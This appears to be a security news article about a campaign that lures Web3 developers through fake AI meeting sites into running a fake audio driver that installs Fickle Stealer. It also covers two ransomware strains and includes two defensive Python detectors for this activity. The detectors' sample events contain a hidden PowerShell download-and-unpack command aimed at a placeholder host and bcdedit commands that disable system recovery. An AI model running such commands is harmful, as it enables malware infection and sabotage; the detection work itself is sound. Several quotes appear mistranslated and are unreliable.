
The financially motivated threat actor known as EncryptHub (aka LARVA-208 and Water Gamayun) has been attributed to a new campaign aimed at infecting Web3 developers with information stealer malware.
“Larva-208 uses fake AI platforms (such as Norlax AI, TeamPilot imitations) to evolve tactics and invite victims with job postings or portfolio review requests.”
The group has a history of ransomware deployment, but the latest findings show an evolution of its tactics and a diversification of how it monetizes, using stealer malware to collect data from cryptocurrency wallets.
EncryptHub's focus on Web3 developers is not random. These individuals often manage crypto wallets, access to smart contract repositories, or sensitive testing environments. Many operate as freelancers or work on multiple decentralized projects, making them difficult to protect with traditional enterprise security controls. This decentralized, high-value developer community is an ideal target for attackers looking to monetize quickly without triggering centralized defenses.
The attack chain involves directing potential targets to the fake artificial intelligence (AI) platform and getting them to click on meeting links within these sites.

Meeting links to these sites are sent, under the pretext of job interviews and portfolio discussions, to developers who follow Web3 and blockchain-related content on platforms such as X and Telegram. The threat actors have also been found sending meeting links to people who applied for positions they posted on the Web3 job board Remote3.
What is interesting is the approach the attackers use to sidestep the security warnings Remote3 displays on its site. Because the service explicitly warns job seekers against downloading unfamiliar video conferencing software, the attackers hold the first conversation over Google Meet and then instruct the applicant to continue the interview on Norlax AI.
Regardless of the method used, when victims click on the meeting link, they are asked to enter their email address and invitation code, after which they are shown a fake error message about an outdated or missing audio driver.
Clicking on the message leads to the download of malicious software disguised as a legitimate Realtek HD audio driver. This runs a PowerShell command that fetches and unpacks Fickle Stealer. Information collected by the stealer malware is sent to an external server codenamed SilentPrism.
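The infection step above, a fake "driver installer" run from the user's download folder that spawns PowerShell to fetch and unpack the stealer, is a process-tree pattern a defender can look for. The following is an added example (not code from the page or from Prodaft) that triages Sysmon-style process-creation records for exactly that chain. Field names, the sample events, the installer file name and the download host are all constructed for the example and are not indicators from the report.

```python
"""Triage process-creation events for a fake-installer -> PowerShell stager chain.

Added example, not the page's or Prodaft's code. Events are constructed
Sysmon-style records with assumed field names; the driver file name and
URL below are made-up samples, not indicators from the report.
"""
import re
from dataclasses import dataclass
from typing import List

# PowerShell primitives that fetch or unpack a second stage. On their own they
# are common in admin scripts; the signal is their combination with the parent.
STAGER_PRIMITIVES = re.compile(
    r"(Invoke-WebRequest|\biwr\b|\bcurl\b|DownloadString|DownloadFile|"
    r"Start-BitsTransfer|Expand-Archive|Invoke-Expression|\biex\b|"
    r"-EncodedCommand|\s-enc\b)",
    re.IGNORECASE,
)
# Folders a just-downloaded "driver installer" would typically run from.
USER_WRITABLE = re.compile(
    r"\\Users\\[^\\]+\\(Downloads|Desktop|AppData\\Local\\Temp)\\", re.IGNORECASE
)
POWERSHELL_HOSTS = ("\\powershell.exe", "\\pwsh.exe")


@dataclass
class ProcEvent:
    timestamp: str
    image: str          # full path of the newly created process
    parent_image: str   # full path of the process that spawned it
    command_line: str


def is_stager_launch(ev: ProcEvent) -> bool:
    """True when PowerShell is started by a binary living in a user-writable
    folder and its command line downloads or unpacks additional content."""
    if not ev.image.lower().endswith(POWERSHELL_HOSTS):
        return False
    if not USER_WRITABLE.search(ev.parent_image):
        return False
    return STAGER_PRIMITIVES.search(ev.command_line) is not None


def triage(events: List[ProcEvent]) -> List[ProcEvent]:
    """Return only the events matching the stager pattern."""
    return [ev for ev in events if is_stager_launch(ev)]


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    # Fake audio driver from Downloads spawning a download-and-unpack stager.
    ProcEvent("2025-07-21T10:03:12Z",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Users\dev\Downloads\Realtek_HD_Audio_Setup.exe",
              r'powershell -w hidden -c "Invoke-WebRequest http://stager.invalid/p.zip '
              r'-OutFile $env:TEMP\p.zip; Expand-Archive $env:TEMP\p.zip $env:TEMP\p"'),
    # Developer running an ordinary command from the shell.
    ProcEvent("2025-07-21T10:05:40Z",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\explorer.exe",
              "powershell -Command Get-ChildItem -Recurse src"),
    # Installed vendor updater (not user-writable) using BITS: not flagged.
    ProcEvent("2025-07-21T10:09:02Z",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Program Files\Vendor\Updater.exe",
              "powershell -Command Start-BitsTransfer -Source https://vendor.invalid/u.msi "
              "-Destination C:\\ProgramData\\u.msi"),
    # Binary in Downloads starting PowerShell for a harmless query: not flagged.
    ProcEvent("2025-07-21T10:12:55Z",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Users\dev\Downloads\tool.exe",
              "powershell -Command Get-Date"),
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(f"{hit.timestamp} stager launch by {hit.parent_image}: {hit.command_line}")
```

The rule deliberately requires all three conditions (PowerShell host, user-writable parent, fetch-or-unpack primitive), which keeps vendor updaters and interactive shells out of the alert queue while still catching the chain described in the report.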

“Threat actors can distribute whimsical infostealers through fake AI applications and successfully harvest cryptocurrency wallets, development qualifications, and sensitive project data,” Prodaft said.
“This latest operation suggests a shift towards alternative monetization strategies that include removal of valuable data and credentials for potential resale or exploitation in illegal markets.”
The development comes as Trustwave SpiderLabs detailed a new ransomware strain called Kawa4096, which attempts to boost its visibility and credibility by mimicking the style of the Akira ransomware group and using a ransom note format similar to Qilin's.
Kawa4096, which first appeared in June 2025, has targeted 11 companies, most of them in the US and Japan. The initial access vector used in the attacks is unknown.
Notable features of Kawa4096 include the ability to encrypt files on shared network drives and the use of multithreading to increase operational efficiency and speed up the scanning and encryption process.
“After identifying valid files, the ransomware adds them to the shared queue,” said security researchers Nathaniel Morales and John Basmayor. “This queue is processed by a pool of worker threads responsible for getting the file path and passing it to the encryption routine. The semaphore is used for synchronization between threads to ensure efficient processing of the file queue.”

Another new entrant to the ransomware landscape claims to be part of the BlackByte group and has been observed in the wild in three incidents detected by Huntress on July 4 and 13, 2025.
In one incident, the threat actors leveraged valid credentials over RDP to gain a foothold on the target network. All the attacks have in common the use of legitimate Windows tools such as svchost.exe and bcdedit.exe to modify the boot configuration in order to hide malicious commands and block system recovery.
“Threat actors also clearly prefer legitimate processes such as BCDEDIT.EXE and svChost.exe, so continuing monitoring of suspicious behavior using these processes via endpoint detection and response (EDR) helps to attack environmental threat actors,” Huntress said.
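Huntress's advice to keep watching bcdedit.exe and svchost.exe translates into a small amount of detection logic over process-creation telemetry. The following is an added example (not code from the page or from Huntress) that flags bcdedit.exe invocations which disable Windows recovery and svchost.exe instances running from the wrong place. The page names the binaries but not the exact switches used in these incidents, so the bcdedit indicators are the well-known recovery-inhibiting settings, the svchost check is an assumed masquerading heuristic, and the log format and sample lines are constructed for the example.

```python
"""Flag boot-configuration tampering and svchost.exe masquerading in process logs.

Added example, not the page's or Huntress's code. Log lines use a constructed
'key=value' process-creation format; the bcdedit switches are well-known
recovery-inhibiting settings, not switches quoted from the report.
"""
import re
from typing import Dict, List, Optional, Tuple

# bcdedit write operations that block recovery. Read-only calls such as
# "bcdedit /enum" are deliberately not matched.
BCDEDIT_TAMPER = [
    ("recovery disabled",
     re.compile(r"/set\s+\S+\s+recoveryenabled\s+(no|off|false|0)\b", re.IGNORECASE)),
    ("boot failures ignored",
     re.compile(r"/set\s+\S+\s+bootstatuspolicy\s+ignoreallfailures\b", re.IGNORECASE)),
    ("safe boot forced",
     re.compile(r"/set\s+\S+\s+safeboot\s+\S+", re.IGNORECASE)),
]

FIELD = re.compile(r'(\w+)=("([^"]*)"|(\S+))')


def parse_event(line: str) -> Dict[str, str]:
    """Parse 'key=value' and 'key="quoted value"' pairs into a dict."""
    return {
        m.group(1): m.group(3) if m.group(3) is not None else m.group(4)
        for m in FIELD.finditer(line)
    }


def classify(ev: Dict[str, str]) -> Optional[str]:
    """Return a reason string when the event is suspicious, else None."""
    image = ev.get("image", "").lower()
    parent = ev.get("parent", "").lower()
    cmd = ev.get("cmd", "")
    if image.endswith("\\bcdedit.exe"):
        for label, pattern in BCDEDIT_TAMPER:
            if pattern.search(cmd):
                return f"boot-config tampering ({label})"
        return None
    if image.endswith("\\svchost.exe"):
        # Assumed heuristic: the real svchost.exe lives in System32 and is
        # started by services.exe; anything else is treated as masquerading.
        if not image.startswith("c:\\windows\\system32\\") or not parent.endswith("\\services.exe"):
            return "svchost.exe masquerading"
    return None


def scan(lines: List[str]) -> List[Tuple[str, str]]:
    """Return (timestamp, reason) for every suspicious line."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        reason = classify(ev)
        if reason:
            hits.append((ev.get("ts", "?"), reason))
    return hits


# Constructed sample log (not real telemetry).
SAMPLE_LOG = [
    'ts=2025-07-04T02:11:08Z image=C:\\Windows\\System32\\bcdedit.exe '
    'parent=C:\\Windows\\System32\\cmd.exe cmd="bcdedit /set {default} recoveryenabled No"',
    'ts=2025-07-04T02:11:09Z image=C:\\Windows\\System32\\bcdedit.exe '
    'parent=C:\\Windows\\System32\\cmd.exe cmd="bcdedit /set {default} bootstatuspolicy ignoreallfailures"',
    'ts=2025-07-04T09:30:00Z image=C:\\Windows\\System32\\bcdedit.exe '
    'parent=C:\\Windows\\System32\\cmd.exe cmd="bcdedit /enum"',
    'ts=2025-07-04T09:31:12Z image=C:\\Windows\\System32\\svchost.exe '
    'parent=C:\\Windows\\System32\\services.exe cmd="svchost.exe -k netsvcs"',
    'ts=2025-07-13T22:45:51Z image=C:\\Users\\Public\\svchost.exe '
    'parent=C:\\Windows\\System32\\cmd.exe cmd="svchost.exe"',
]

if __name__ == "__main__":
    for ts, reason in scan(SAMPLE_LOG):
        print(ts, reason)
```

Two of the sample bcdedit lines are flagged and the read-only `/enum` is not; the svchost.exe copy in `C:\Users\Public` is flagged on path alone, while the genuine service host started by services.exe passes. Because the attackers in these incidents used the legitimate binaries rather than dropping custom tooling, command-line and parent-process context like this is what separates their activity from routine administration.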